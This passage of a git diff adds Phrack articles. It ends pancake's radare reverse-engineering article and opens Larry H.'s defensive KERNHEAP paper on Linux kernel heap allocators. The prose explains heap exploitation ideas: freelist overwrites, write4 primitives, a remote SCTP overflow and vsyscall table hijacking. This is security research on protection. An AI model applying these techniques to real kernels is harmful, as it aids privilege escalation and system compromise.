+statically on-disk.
+
+
+--[ 4.1 - Finding xrefs
+
+One of the most interesting information we need when understanding how a
+program works or what it does is the flow graph between functions. This
+give us the big picture of the program and allows us to find faster the
+points of interest.
+
+There are different ways to obtain this information in radare, but you will
+finally manage it with the 'Cx' and 'CX' commands (x=code xref, X=data
+xref).  This means that you can even write your own program to extract this
+information and import it into radare by just interpreting the output of
+the program or a file.
+
+  [0x8048000]> !!my-xrefs-analysis a.out > a.out.xrefs
+  [0x8048000]> . a.out.xrefs
+  or
+  [0x8048000]> .!my-xrefs-analysis a.out
+
+At the time of writing this, radare implements a basic code analysis
+algorithm that identifies function boundaries, splits basic blocks, finds
+local variables and arguments, tracks their access and also identifies code
+and data references of individual instructions.
+
+When 'file.analyze' is 'true', this code analysis is done recursively over
+the entrypoint and all the symbols identified by rabin. This means that it
+will not be able to automatically resolve code references following pointer
+tables, register branches and so on and lot of code will remain unanalyzed.
+
+We can manually force to analyze a function at a certain offset by using
+the '.afr@addr' command which will interpret ('.') the output of the
+command 'afr' that stands for 'analyze function recursively' at (@) a
+certain address (addr).
+
+When a 'call' instruction is identified, the code analysis will register a
+code xref from the instruction to the endpoint. This is because compilers
+uses these instructions to call into subroutines or symbols.
+
+As we did previously, we can disassemble the whole text section looking for
+a 'call' instruction and register code xrefs between the source and
+destination address with these two lines:
+
+  [0x000074E0]> e asm.profile=simple
+  [0x000074E0]> "(xref,Cx `pd 1~[2]`)"
+  [0x000074E0]> .(xref) @@=`pd 100~call[0]`
+
+We use the simple asm.profile to make the disassembly text parsing easier.
+
+The first line will register a macro named 'xref' that creates a code xref
+at address pointed by the 3rd word of the disassembled instruction.
+
+In the second line it will run the previous macro at every offset specified
+by the output of the "pd 100~call[0]" instruction. This is the offset of
+every call instruction of the following 100 instructions.
+
+When disassembling code (using the 'pd' command (print disasm)) xrefs will
+be displayed if asm.xrefs is enabled. Optionally, we can set asm.xrefsto to
+visualize the xref information at both end-points of the code reference.
+
+
+--[ 4.2 - Blind code references
+
+The xrefs(1) program that comes with radare implements a blind code
+reference search algorithm based on identifying sequences of bytes matching
+a certain pattern.
+
+The pattern is calculated depending on the offset. This way the program
+calculates the relative delta between the current offset and the
+destination address and tries to find relative branches from one point to
+another of the program.
+
+The current implementation supports x86, arm and powerpc, but allows to
+define templates of branch instructions for other architectures by using
+the option flags to determine the instruction size, endianness, the way to
+calculate the delta, etc.
+
+The main purpose of this program was to identify code xrefs on big files
+(like firmwares), where the code analysis takes too long or requires many
+manual interaction, it is not designed to identify absolute calls or jumps.
+
+Here's an usage example:
+
+  $ xrefs -a arm bigarmblob.bin 0x6a390
+  0x80490
+  0x812c4
+
+
+--[ 4.3 - Graphing xrefs
+
+Radare ships some commands to manage and create interactive graphs to
+display code analysis based on basic blocks, function blocks or whatever we
+want by using the 'gu' command (graph user)
+
+The most simple way to use the graphing capabilities is to use the 'ag'
+command that will directly popup a gtk window with a graphed code analysis
+from the current seek, splitting the code by basic blocks. (use the eval
+graph.jmpblocks and graph.callblocks to split blocks by jumps or calls to
+analyze basic blocks or function blocks).
+
+The graph is stored internally, but if we want to create our own graphs
+we can use the 'gu' command which provides subcommands to reset a graph,
+create nodes, edges and display them.
+
+  [0x08049A00]> gu?
+  Usage: gu[dnerv] [args]
+   gur              user graph reset
+   gun $$ $$b pd    add node
+   gue $$F $$t      add edge
+   gud              display graph in dot format
+   guv              visualize user defined graph
+
+This is a radare script that will generate a graph between analyzed
+function by using the xrefs metadata information.
+
+After configuring the graph we can display it using the internal viewer
+(guv) or using graphviz's dot.
+
+--------8<---------------
+"(xrefs-to from,f XT @ `Cx~$0[3]`,)" 
+"(graph-xrefs-init,gur,)"
+"(graph-xrefs,.(xrefs-to `?v $$`),gue $$F XT,)"
+"(graph-viz,gud > dot,!!dot -Tpng -o graph.png dot,!!gqview graph.png,)"
+
+.(graph-xrefs-init)
+.(graph-xrefs) @@= `Cx~[1]`
+.(graph-viz)
+--------8<---------------
+
+Here's the explanation of the previous script:
+
+Note that all commands are quoted '"' because this way the inner special
+characters are ignored ('>', '~' ...)
+
+"(xrefs-to from,f XT @ `Cx~$0[3]`,)" 
+
+   Register a macro named 'xrefs-to' that accepts one argument named 'from'
+   and aliased as $0 inside the macro body.
+
+   The macro executes the 'f XT' (create a flag named XT) at ('@') the
+   address where the code xref (Cx) points (3rd column of the row
+   matching $0 (the first argument of the macro (from)).
+
+"(graph-xrefs-init,gur,)"
+
+   The 'graph-xrefs-init' macro resets the graph user metadata.
+
+"(graph-xrefs,.(xrefs-to `?v $$`),gue $$F XT,)"
+
+   This macro named 'graphs-xrefs' that run commands separated by commas:
+
+   .(xrefs-to `?v $$`)
+
+      execute the macro 'xrefs-to' at current seek ($$), the value is
+      concatenated to the output of executing '?v $$' which evaluates
+      the '$$' special variable and prints the value in hexadecimal.
+
+   gue XF XT
+
+      Adds an 'graph-user' edge between the beginning of the function at
+      current seek and XT.
+
+"(graph-viz,gud > dot,!!dot -Tpng -o graph.png dot,!!rsc view graph.png,)"
+
+   These commands will generate a dot file, render it in png and display it.
+
+.(graph-xrefs-init)
+.(graph-xrefs) @@= `Cx~[1]`
+.(graph-viz)
+
+   Then, we bundle all those macros and the xrefs graph will be displayed
+
+
+--[ 4.4 - Randomizing xrefs
+
+Another annoying low level manipulation we can do is to repeat functions at
+random places with random modifications to make the program code more
+verbose and hard to analyze because of complex control flow paths.
+
+By doing a cross-references (xrefs) analysis between the symbols we will be
+able to determine which symbols are referenced more from than one single
+point.
+
+The internal grep syntax can be tricky to retrieve lists of offsets for
+xrefs at a given position.
+
+  [0x0000c830]> Cx
+  Cx 0x00000c59 @ 0x00000790
+  Cx 0x00000c44 @ 0x000007b0
+  Cx 0x00000c35 @ 0x00000810
+  Cx 0x00000c26 @ 0x000008a0
+  ...
+
+These numbers specify the caller address and the called one. That is:
+
+  0xc59 -(calls)-> 0x790
+
+To disassemble the opcodes referencing code to other positions we can use the
+'pd' command with a foreach statement:
+
+  [0x0000c830]> pd 1 @@= `C*~Cx[1]`
+
+This command will run 'pd 1' on every address specified in the 1st column
+of the output of the 'C*~Cx[1]'
+
+
+--[ 5 - Conclussion
+
+This article has covered many aspects of reverse engineering, low level
+program manipulation, binary patching/diffing and more, despite being a
+concrete task it has tried to expose a variety of scenarios where a command
+line hexadecimal editor becomes an essential tool.
+
+Several external scripting languages can be used, don't care about the
+cryptic scripting of the radare commands, there are APIs for perl, ruby and
+python for controlling radare and analyze code or connect to remote
+radares.
+
+Being used in batch mode enables the ability to automatize many analysis
+tasks, generate graphs of code, determine if it is packed or infected, find
+vulnerabilities, etc.
+
+Maybe the more important characteristic of this software is the abstraction
+of the IO which allows you to open hard disk images, serial connections,
+process memory, haret wince devices, gdb-enabled applications like bochs,
+vmware, qemu, shared memory areas, winedbg and more.
+
+There are lot of things we have not covered in this article but the main
+concepts have been exposed while explaining multiple protection techniques
+for binaries.
+
+Using scriptable tools for implementing binary protection techniques eases
+the development and permits to recycle and accelerate the analysis and
+manipulation of files.
+
+
+--[ 6 - Future work
+
+The project was born in 2006, and it has grown pretty fast.
+
+At the moment of writing this paper the development is done on two
+different branches: radare and radare2.
+
+The second one is a complete refactoring of the original code aiming to
+reimplement all the features of the radare framework into multiple
+libraries.
+
+This design permits to bypass some limitations of the design of r1 enabling
+full scripting support for specific or composed set of libraries. Each
+module extends its functionalities into plugins.
+
+While using parrot as a virtual machine, multiple scripting languages can
+be used together. Being scripting language agnostic enables the possibility
+to mix multiple frameworks together (like metasploit [5], ERESI [6], etc)
+
+The modular design based on libraries, plugins and scripts will open new
+ways to extend the framework by third party developers and additionally
+make the code much more maintainable and bugfree.
+
+New applications will appear on top of the r2 set of libraries, there are
+some projects aiming to integrate it from web frontends and graphical
+frontends.
+
+Plugins extend the modules adding support for new architectures, binary
+formats, code analysis modules, debugging backends, remote protocols,
+scripting facilities and more.
+
+At the moment of writing this, radare2 (aka libr) is actually under
+development but implements some test programs that try to reimplement the
+applications distributed with radare.
+
+
+--[ 7 - References
+ 
+ [0] radare homepage
+ http://www.radare.org
+
+ [1] radare book (pdf)
+ http://www.radare.org/get/radare.pdf
+
+ [2] x86-32/64 architecture
+ http://www.intel.com/Assets/PDF/manual/253666.pdf
+
+ [3] ELF file format
+ http://en.wikipedia.org/wiki/Executable_and_Linkable_Format
+
+ [4] AT&T syntax
+ http://sig9.com/articles/att-syntax 
+
+ [5] Metasploit, ruby based exploit development framework
+ http://www.metasploit.com/
+
+ [6] ERESI
+ http://www.eresi-project.org/
+ 
+
+--[ 8 - Greetings
+
+Thanks to JV for his support during the write-up of this article, and to
+the Phrack staff to make the publication possible.
+
+I would also like to greet some people for their support while the
+development of radare and this article:
+
+  SexyPandas .. for the great quals, ctfs and moments
+  nopcode .. for those great cons, feedback and beers
+  nibble  .. for those pingpong development sessions and support
+  killabyte .. for the funny abstract situations we faced everyday
+  esteve .. for the talks, knowledge and the arm/wince reversing tips
+  wzzx .. for the motivators, feedback and luls
+  lia .. my gf which supported me all those nightly hacking hours :)
+  ..
+
+Certainly...
+
+Thanks to all the people who managed to read the whole text and also to the
+rest for being part of that ecosystem named 'underground' and computer
+security which bring us lot of funny hours.
+
+There is still lot of work to be done, and ideas or contributions are
+always welcome. Feel free to send me comments.
+
+                                                       --pancake
+
+--------[ EOF
diff --git a/phrack66/15.txt b/phrack66/15.txt
new file mode 100644
index 0000000..ed6cb01
--- /dev/null
+++ b/phrack66/15.txt
@@ -0,0 +1,2192 @@
+                               ==Phrack Inc.==
+
+               Volume 0x0d, Issue 0x42, Phile #0x0F of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=--------------=[ Linux Kernel Heap Tampering Detection ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------=[ Larry H. <larry@subreption.com> ]=----------------=|
+|=-----------------------------------------------------------------------=|
+
+
+------[  Index
+
+    1 - History and background of the Linux kernel heap allocators
+
+        1.1 - SLAB
+        1.2 - SLOB
+        1.3 - SLUB
+        1.4 - SLQB
+        1.5 - The future
+
+    2 - Introduction: What is KERNHEAP?
+
+    3 - Integrity assurance for kernel heap allocators
+
+        3.1 - Meta-data protection against full and partial overwrites
+        3.2 - Detection of arbitrary free pointers and freelist corruption
+        3.3 - Overview of NetBSD and OpenBSD kernel heap safety checks
+        3.4 - Microsoft Windows 7 kernel pool allocator safe unlinking
+
+    4 - Sanitizing memory of the look-aside caches
+
+    5 - Deterrence of IPC based kmalloc() overflow exploitation
+
+    6 - Prevention of copy_to_user() and copy_from_user() abuse
+
+    7 - Prevention of vsyscall overwrites on x86_64
+
+    8 - Developing the right regression testsuite for KERNHEAP
+
+    9 - The Inevitability of Failure
+
+        9.1 - Subverting SELinux and the audit subsystem
+        9.2 - Subverting AppArmor
+
+    10 - References
+
+    11 - Thanks and final statements
+
+    12 - Source code
+
+------[ 1. History and background of the Linux kernel heap allocators
+
+    Before discussing what is KERNHEAP, its internals and design, we will have
+    a glance at the background and history of Linux kernel heap allocators.
+
+    In 1994, Jeff Bonwick from Sun Microsystems presented the SunOS 5.4
+    kernel heap allocator at USENIX Summer [1]. This allocator produced higher
+    performance results thanks to its use of caches to hold invariable state
+    information about the objects, and reduced fragmentation significantly,
+    grouping similar objects together in caches. When memory was under stress,
+    the allocator could check the caches for unused objects and let the system
+    reclaim the memory (that is, shrinking the caches on demand).
+
+    We will refer to these units composing the caches as "slabs". A slab
+    comprises contiguous pages of memory. Each page in the slab holds chunks
+    (objects or buffers) of the same size. This minimizes internal
+    fragmentation, since a slab will only contain same-sized chunks, and
+    only the 'trailing' or free space in the page will be wasted, until it
+    is required for a new allocation. The following diagram shows the
+    layout of Bonwick's slab allocator:
+
+        +-------+
+        | CACHE |
+        +-------+    +---------+
+        | CACHE |----|  EMPTY  |
+        +-------+    +---------+    +------+      +------+
+                     | PARTIAL |----| SLAB |------| PAGE |    (objects)
+                     +---------+    +------+      +------+    +-------+
+                     |  FULL   |      ...             |-------| CHUNK |
+                     +---------+                              +-------+
+                                                              | CHUNK |
+                                                              +-------+
+                                                              | CHUNK |
+                                                              +-------+
+                                                                 ...
+
+    These caches operated in a LIFO manner: when an allocation was requested
+    for a given size, the allocator would seek for the first available free
+    object in the appropriate slab. This saved the cost of page allocation
+    and creation of the object altogether.
+
+        "A slab consists of one or more pages of virtually contiguous
+        memory carved up into equal-size chunks, with a reference count
+        indicating how many of those chunks have been allocated."
+        Page 5, 3.2 Slabs. [1]
+
+    Each slab was managed with a kmem_slab structure, which contained its
+    reference count, freelist of chunks and linkage to the associated
+    kmem_cache. Each chunk had a header defined as the kmem_bufctl (chunks
+    are commonly referred to as buffers in the paper and implementation),
+    which contained the freelist linkage, address to the buffer and a
+    pointer to the slab it belongs to. The following diagram shows the
+    layout of a slab:
+
+                           .-------------------.
+                           | SLAB (kmem_slab)  |
+                           `-------+--+--------'
+                                  /    \
+                            +----+---+--+-----+
+                            | bufctl | bufctl |
+                            +-.-'----+.-'-----+
+                          _.-'     .-'
+                     +-.-'------.-'-----------------+
+                     |        |        | ':>=jJ6XKNM|
+                     | buffer | buffer | Unused XQNM|
+                     |        |        | ':>=jJ6XKNM|
+                     +------------------------------+
+                     [            Page (s)          ]
+
+    For chunk sizes smaller than 1/8 of a page (ex. 512 bytes for x86), the
+    meta-data of the slab is contained within the page, at the very end.
+    The rest of space is then divided in equally sized chunks. Because all
+    buffers have the same size, only linkage information is required,
+    allowing the rest of values to be computed at runtime, saving space.
+    The freelist pointer is stored at the end of the chunk. Bonwick
+    states that this due to end of data structures being less active than
+    the beginning, and permitting debugging to work even when an
+    use-after-free situation has occurred, overwriting data in the buffer,
+    relying on the freelist pointer being intact. In deliberate attack
+    scenarios this is obviously a flawed assumption. An additional word was
+    reserved too to hold a pointer to state information used by objects
+    initialized through a constructor.
+
+    For larger allocations, the meta-data resides out of the page.
+
+    The freelist management was simple: each cache maintained a circular
+    doubly-linked list sorted to put the empty slabs (all buffers
+    allocated) first, the partial slabs (free and allocated buffers) and
+    finally the full slabs (reference counter set to zero, all buffers
+    free). The cache freelist pointer points to the first non-empty slab,
+    and each slab then contains its own freelist. Bonwick chose this
+    approach to simplify the memory reclaiming process.
+
+    The process of reclaiming memory started at the original
+    kmem_cache_free() function, which verified the reference counter. If
+    its value was zero (all buffers free), it moved the full slab to the
+    tail of the freelist with the rest of full slabs. Section 4 explains
+    the intrinsic details of hardware cache side effects and optimization.
+    It is an interesting read due to the hardware used at the time the
+    paper was written. In order to optimize cache utilization and bus
+    balance, Bonwick devised 'slab coloring'. Slab coloring is simple: when
+    a slab is created, the buffer address starts at a different offset
+    (referred to as the color) from the slab base (since a slab is an
+    allocated page or pages, this is always aligned to page size).
+
+    It is interesting to note that Bonwick already studied different
+    approaches to detect kernel heap corruption, and implemented them in
+    the SunOS 5.4 kernel, possibly predating every other kernel in terms of
+    heap corruption detection). Furthermore, Bonwick noted the performance
+    impact of these features was minimal.
+
+        "Programming errors that corrupt the kernel heap - such as
+        modifying freed memory, freeing a buffer twice, freeing an
+        uninitialized pointer, or writing beyond the end of a buffer — are
+        often difficult to debug. Fortunately, a thoroughly instrumented
+        ker- nel memory allocator can detect many of these problems."
+        page 10, 6. Debugging features. [1]
+
+    The audit mode enabled storage of the user of every allocation (an
+    equivalent of the Linux feature that will be briefly described in
+    the allocator subsections) and provided these traces when corruption
+    was detected.
+
+    Invalid free pointers were detected using a hash lookup in the
+    kmem_cache_free() function. Once an object was freed, and after the
+    destructor was called, it filled the space with 0xdeadbeef. Once this
+    object was being allocated again, the pattern would be verified to see
+    that no modifications occurred (that is, detection of use-after-free
+    conditions, or write-after-free more specifically). Allocated objects
+    were filled with 0xbaddcafe, which marked it as uninitialized.
+
+    Redzone checking was also implemented to detect overwrites past the end
+    of an object, adding a guard value at that position. This was verified
+    upon free.
+
+    Finally, a simple but possibly effective approach to detect memory
+    leaks used the timestamps from the audit log to find allocations which
+    had been online for a suspiciously long time. In modern times, this
+    could be implemented using a kernel thread. SunOS did it from userland
+    via /dev/kmem, which would be unacceptable in security terms.
+
+    For more information about the concepts of slab allocation, refer to
+    Bonwick's paper at [1] provides an in-depth overview of the theory and
+    implementation.
+
+    ---[ 1.1 SLAB
+
+        The SLAB allocator in Linux (mm/slab.c) was written by Mark Hemment
+        in 1996-1997, and further improved through the years by Manfred
+        Spraul and others. The design follows closely that presented by Bonwick for
+        his Solaris allocator. It was first integrated in the 2.2 series.
+        This subsection will avoid describing more theory than the strictly
+        necessary, but those interested on a more in-depth overview of SLAB
+        can refer to "Understanding the Linux Virtual Memory Manager" by
+        Mel Gorman, and its eighth chapter "Slab Allocator" [X].
+
+        The caches are defined as a kmem_cache structure, comprised of
+        (most commonly) page sized slabs, containing initialized objects.
+        Each cache holds its own GFP flags, the order of pages per slab
+        (2^n), the number of objects (chunks) per slab, coloring offsets
+        and range, a pointer to a constructor function, a printable name
+        and linkage to other caches. Optionally, if enabled, it can define
+        a set of fields to hold statistics an debugging related
+        information.
+
+        Each kmem_cache has an array of kmem_list3 structures, which contain
+        the information about partial, full and free slab lists:
+
+            struct kmem_list3 {
+                struct list_head slabs_partial;
+                struct list_head slabs_full;
+                struct list_head slabs_free;
+                unsigned long free_objects;
+                unsigned int free_limit;
+                unsigned int colour_next;
+                ...
+                unsigned long next_reap;
+                int free_touched;
+            };
+
+        These structures are initialized with kmem_list3_init(), setting
+        all the reference counters to zero and preparing the list3 to be
+        linked to its respective cache nodelists list for the proper NUMA
+        node. This can be found in cpuup_prepare() and kmem_cache_init().
+
+        The "reaping" or draining of the cache free lists is done with the
+        drain_freelist() function, which returns the total number of slabs
+        released, initiated via cache_reap(). A slab is released using
+        slab_destroy(), and allocated with the cache_grow() function for a
+        given NUMA node, flags and cache.
+
+        The cache contains the doubly-linked lists for the partial, full
+        and free lists, and a free object count in free_objects.
+
+        A slab is defined with the following structure:
+
+            struct slab {
+            	struct list_head list;     /* linkage/pointer to freelist */
+            	unsigned long colouroff;   /* color / offset */
+            	void *s_mem;		       /* start address of first object */
+            	unsigned int inuse;	       /* num of objs active in slab */
+            	kmem_bufctl_t free;        /* first free chunk (or none) */
+            	unsigned short nodeid;     /* NUMA node id  for nodelists */
+            };
+
+        The list member points to the freelist the slab belongs to:
+        partial, full or empty. The s_mem is used to calculate the address
+        to a specific object with the color offset. Free holds the list of
+        objects. The cache of the slab is tracked in the page structure.
+
+        The functions used to retrieve the cache a potential object belongs
+        to is virt_to_cache(), which itself relies on page_get_cache() on a
+        page structure pointer. It checks that the Slab page flag is set,
+        and takes the lru.next pointer of the head page (to be compatible
+        with compound pages, this is no different for normal pages). The
+        cache is set with page_set_cache(). The behavior to assign pages to
+        a slab and cache can be seen in slab_map_pages().
+        
+        The internal function used for cache shrinking is __cache_shrink(),
+        called from kmem_cache_shrink() and during cache destruction. SLAB
+        is clearly poor at the scalability side: on NUMA systems with a
+        large number of nodes, substantial time will be spent on walking
+        the nodelists, drain each freelist, and so forth. In the process,
+        it is most likely that some of those nodes won't be under memory
+        pressure.
+
+        slab management data is stored inside the slab itself when the size
+        is under 1/8 of PAGE_SIZE (512 bytes for x86, same as Bonwick's
+        allocator). This is done by alloc_slabmgmt(), which either stores
+        the management structure within the slab, or allocates space for it
+        from the kmalloc caches (slabp_cache within the kmem_cache
+        structure, assigned with kmem_find_general_cachep() given the slab
+        size). Again, this is reflected in slab_destroy() which takes care
+        of freeing the off-slab management structure when applicable.
+
+        The interesting security impact of this logic in managing control
+        structures is that slabs with their meta-data stored off-slab, in
+        one of the general kmalloc caches, will be exposed to potential
+        abuse (ex. in a slab overflow scenario in some adjacent object, the
+        freelist pointer could be overwritten to leverage a
+        write4-primitive during unlinking). This is one of the loopholes
+        which KERNHEAP, as described in this paper, will close or at very
+        least do everything feasible to deter reliable exploitation.
+
+        Since the basic technical aspects of the SLAB allocator are now
+        covered, the reader can refer to mm/slab.c in any current kernel
+        release for further information.
+
+    ---[ 1.2 SLOB
+
+        Released in November 2005, it was developed since 2003 by Matt Mackall
+        for use in embedded systems due to its smaller memory footprint. It
+        lacks the complexity of all other allocators.
+
+        The granularity of the SLOB allocator supports objects as little as 2
+        bytes in size, though this is subject to architecture-dependent
+        restrictions (alignment, etc). The author notes that this will
+        normally be 4 bytes for 32-bit architectures, and 8 bytes on 64-bit.
+
+        The chunks (referred as blocks in his comments at mm/slob.c) are
+        referenced from a singly-linked list within each page. His approach to
+        reduce fragmentation is to place all objects within three distinctive
+        lists: under 256 bytes, under 1024 bytes and then any other objects
+        of size greater than 1024 bytes.
+
+        The allocation algorithm is a classic next-fit, returning the first
+        slab containing enough chunks to hold the object. Released objects are
+        re-introduced into the freelist in address order.
+
+        The kmalloc and kfree layer (that is, the public API exposed from
+        SLOB) places a 4 byte header in objects within page size, or uses the
+        lower level page allocator directly if greater in size to allocate
+        compound pages. In such cases, it stores the size in the page
+        structure (in page->private). This poses a problem when detecting the
+        size of an allocated object, since essentially the slob_page and
+        page structures are the same: it's an union and the values of the
+        structure members overlap. Size is enforced to match, but using the
+        wrong place to store a custom value means a corrupted page state.
+
+        Before put_page() or free_pages(), SLOB clears the Slob bit, resets
+        the mapcount atomically and sets the mapping to NULL, then the page
+        is released back to the low-level page allocator. This prevents the
+        overlapping fields from leading to the aforementioned corrupted
+        state situation. This hack allows both SLOB and the page
+        allocator meta-data to coexist, allowing a lower memory footprint
+        and overhead.
+
+    ---[ 1.3 SLUB aka The Unqueued Allocator
+
+        The default allocator in several GNU/Linux distributions at the
+        moment, including Ubuntu and Fedora. It was developed by
+        Christopher Lameter and merged into the -mm tree in early 2007.
+
+            "SLUB is a slab allocator that minimizes cache line usage
+            instead of managing queues of cached objects (SLAB approach).
+            Per cpu caching is realized using slabs of objects instead of
+            queues of objects. SLUB can use memory efficiently and has
+            enhanced diagnostics." CONFIG_SLUB documentation, Linux kernel.
+
+        The SLUB allocator was the first introducing merging, the concept
+        of grouping slabs of similar properties together, reducing the
+        number of caches present in the system and internal fragmentation.
+
+        This, however, has detrimental security side effects which are
+        explained in section 3.1. Fortunately even without a patched
+        kernel, merging can be disabled on runtime.
+
+        The debugging facilities are far more flexible than those in SLAB.
+        They can be enabled on runtime using a boot command line option,
+        and per-cache.
+
+        DMA caches are created on demand, or not-created at all if support
+        isn't required.
+
+        Another important change is the lack of SLAB's per-node partial
+        lists. SLUB has a single partial list, which prevents partially
+        free-allocated slabs from being scattered around, reducing
+        internal fragmentation in such cases, since otherwise those node
+        local lists would only be filled when allocations happen in that
+        particular node.
+
+        Its cache reaping has better performance than SLAB's, especially on
+        SMP systems, where it scales better. It does not require walking
+        the lists every time a slab is to be pushed into the partial list.
+        For non-SMP systems it doesn't use reaping at all.
+
+        Meta-data is stored using the page structure, instead of withing
+        the beginning of each slab, allowing better data alignment and
+        again, this reduces internal fragmentation since objects can be
+        packed tightly together without leaving unused trailing space in
+        the page(s). Memory requirements to hold control structures is much
+        lower than SLAB's, as Lameter explains:
+
+            "SLAB Object queues exist per node, per CPU. The alien cache
+            queue even has a queue array that contain a queue for each
+            processor on each node. For very large systems the number of
+            queues and the number of objects that may be caught in those
+            queues grows exponentially. On our systems with 1k nodes /
+            processors we have several gigabytes just tied up for storing
+            references to objects for those queues  This does not include
+            the objects that could be on those queues."
+
+        To sum it up in a single paragraph: SLUB is a clever allocator
+        which is designed for modern systems, to scale well, work reliably
+        in SMP environments and reduce memory footprint of control and
+        meta-data structures and internal/external fragmentation. This
+        makes SLUB the best current target for KERNHEAP development.
+
+    ---[ 1.4 SLQB
+
+        The SLQB allocator was developed by Nick Piggin to provide better
+        scalability and avoid fragmentation as much as possible. It makes a
+        great deal of an effort to avoid allocation of compound pages,
+        which is optimal when memory starts running low. Overall, it is a
+        per-CPU allocator.
+
+        The structures used to define the caches are slightly different,
+        and it shows that the allocator has been to designed from ground
+        zero to scale on high-end systems. It tries to optimize remote
+        freeing situations (when an object is freed in a different node/CPU
+        than it was allocated at). This is relevant to NUMA environments,
+        mostly. Objects more likely to be subjected to this situation are
+        long-lived ones, on systems with large numbers of processors.
+
+        It defines a slqb_page structure which "overloads" the lower level
+        page structure, in the same fashion as SLOB does. Instead of an
+        unused padding, it introduces kmem_cache_list ad freelist pointers.
+
+        For each lookaside cache, each CPU has a LIFO list of the objects
+        local to that node (used for local allocation and freeing), a free
+        and partial pages lists, a queue for objects being freed remotely
+        and a queue of already free objects that come from other CPUs remote
+        free queues. Locking is minimal, but sufficient to control
+        cross-CPU access to these queues.
+
+        Some of the debugging facilities include tracking the user of the
+        allocated object (storing the caller address, cpu, pid and the
+        timestamp). This track structure is stored within the allocated
+        object space, which makes it subject to partial or full overwrites,
+        thus unsuitable for security purposes like similar facilities in
+        other allocators (SLAB and SLUB, since SLOB is impaired for
+        debugging).
+
+        Back on SLQB-specific changes, the use of a kmem_cache_cpu
+        structure per CPU can be observed. An article at LWN.net by
+        Jonathan Corbet in December 2008, provides a summary about the
+        significance of this structure:
+
+            "Within that per-CPU structure one will find a number of lists
+            of objects. One of those (freelist) contains a list of
+            available objects; when a request is made to allocate an
+            object, the free list will be consulted first. When objects are
+            freed, they are returned to this list. Since this list is part
+            of a per-CPU data structure, objects normally remain on the
+            same processor, minimizing cache line bouncing. More
+            importantly, the allocation decisions are all done per-CPU,
+            with no bad cache behavior and no locking required beyond the
+            disabling of interrupts. The free list is managed as a stack,
+            so allocation requests will return the most recently freed
+            objects; again, this approach is taken in an attempt to
+            optimize memory cache behavior." [5]
+
+        In order to couple with memory stress situations, the freelists
+        can be flushed to return unused partial objects back to the page
+        allocator when necessary. This works by moving the object to the
+        remote freelist (rlist) from the CPU-local freelist, and keep a
+        reference in the remote_free list.
+
+        The SLQB allocator is well described in depth in the aforementioned
+        article and the source code comments. Feel free to refer to these
+        sources for more in-depth information about its design and
+        implementation. The original RFC and patch can be found at
+        http://lkml.org/lkml/2008/12/11/417
+
+    ---[ 1.5 The future
+
+        As architectures and computing platforms evolve, so will the
+        allocators in the Linux kernel. The current development process
+        doesn't contribute to a more stable, smaller set of options, and it
+        will be inevitable to see new allocators introduced into the kernel
+        mainline, possibly specialized for certain environments.
+
+        In the short term, SLUB will remain the default, and there seems to
+        be an intention to remove SLOB. It is unclear if SLBQ will see
+        widely spread deployment.
+
+        Newly developed allocators will require careful assessment, since
+        KERNHEAP is tied to certain assumptions about their internals. For
+        instance, we depend on the ability to track object sizes properly,
+        and it remains untested for some obscure architectures, NUMA
+        systems and so forth. Even a simple allocator like SLOB posed a
+        challenge to implement safety checks, since the internals are
+        greatly convoluted. Thus, it's uncertain if future ones will
+        require a redesign of the concepts composing KERNHEAP.
+
+------[ 2. Introduction: What is KERNHEAP?
+
+    As of April 2009, no operating system has implemented any form of
+    hardening in its kernel heap management interfaces. Attacks against the
+    SLAB allocator in Linux have been documented and made available to the
+    public as early as 2005, and used to develop highly reliable exploits
+    to abuse different kernel vulnerabilities involving heap allocated
+    buffers.  The first public exploit making use of kmalloc() exploitation
+    techniques was the MCAST_MSFILTER exploit by twiz [10].
+
+    In January 2009, an obscure, non advertised advisory surfaced about a
+    buffer overflow in the SCTP implementation in the Linux kernel, which
+    could be abused remotely, provided that a SCTP based service was
+    listening on the target host. More specifically, the issue was located
+    in the code which processes the stream numbers contained in FORWARD-TSN
+    chunks.
+
+    During a SCTP association, a client sends an INIT chunk specifying a
+    number of inbound and outbound streams, which causes the kernel in the
+    server to allocate space for them via kmalloc(). After the association
+    is made effective (involving the exchange of INIT-ACK, COOKIE and
+    COOKIE-ECHO chunks), the attacker can send a FORWARD-TSN chunk with
+    more streams than those specified initially in the INIT chunk, leading
+    to the overflow condition which can be used to overwrite adjacent heap
+    objects with attacker controlled data. The vulnerability itself had
+    certain quirks and requirements which made it a good candidate for a
+    complex exploit, unlikely to be available to the general public, thus
+    restricted to more technically adept circles on kernel exploitation.
+    Nonetheless, reliable exploits for this issue were developed and
+    successfully used in different scenarios (including all major
+    distributions, such as Red Hat with SELinux enabled, and Ubuntu with
+    AppArmor).
+
+    At some point, Brad Spengler expressed interest on a potential protection
+    against this vulnerability class, and asked the author what kind of
+    measures could be taken to prevent new kernel-land heap related bugs
+    from being exploited. Shortly afterwards, KERNHEAP was born.
+
+    After development started, a fully remote exploit against the SCTP flaw
+    surfaced, developed by sgrakkyu [15]. In private discussions with few
+    individuals, a technique for executing a successful attack remotely was
+    proposed: overwrite a syscall pointer to an attacker controlled
+    location (like a hook) to safely execute our payload out of the
+    interrupt context.  This is exactly what sgrakkyu implemented for
+    x86_64, using the vsyscall table, which bypasses CONFIG_DEBUG_RODATA
+    (read-only .rodata) restrictions altogether. His exploit exposed not
+    only the flawed nature of the vulnerability classification process of
+    several organizations, the hypocritical and unethical handling of
+    security flaws of the Linux kernel developers, but also the futility of
+    SELinux and other security models against kernel vulnerabilities.
+
+    In order to prevent and detect exploitation of this class of security
+    flaws in the kernel, a new set of protections had to be designed and
+    implemented: KERNHEAP.
+
+    KERNHEAP encompasses different concepts to prevent and detect heap
+    overflows in the Linux kernel, as well as other well known heap related
+    vulnerabilities, namely double frees, partial overwrites, etc.
+
+    These concepts have been implemented introducing modifications into the
+    different allocators, as well as common interfaces, not only
+    preventing generic forms of memory corruption but also hardening
+    specific areas of the kernel which have been used or could be
+    potentially used to leverage attacks corrupting the heap. For instance,
+    the IPC subsystem, the copy_to_user() and copy_from_user() APIs and
+    others.
+
+    This is still ongoing research and the Linux kernel is an ever evolving
+    project which poses significant challenges. The inclusion of new
+    allocators will always pose a risk for new issues to surface, requiring
+    these protections to be adapted, or new ones developed for them.
+
+------[ 3. Integrity assurance for kernel heap allocators
+
+    ---[ 3.1 Meta-data protection against full and partial overwrites
+
+    As of the current (yet ever changing) upstream design of the current
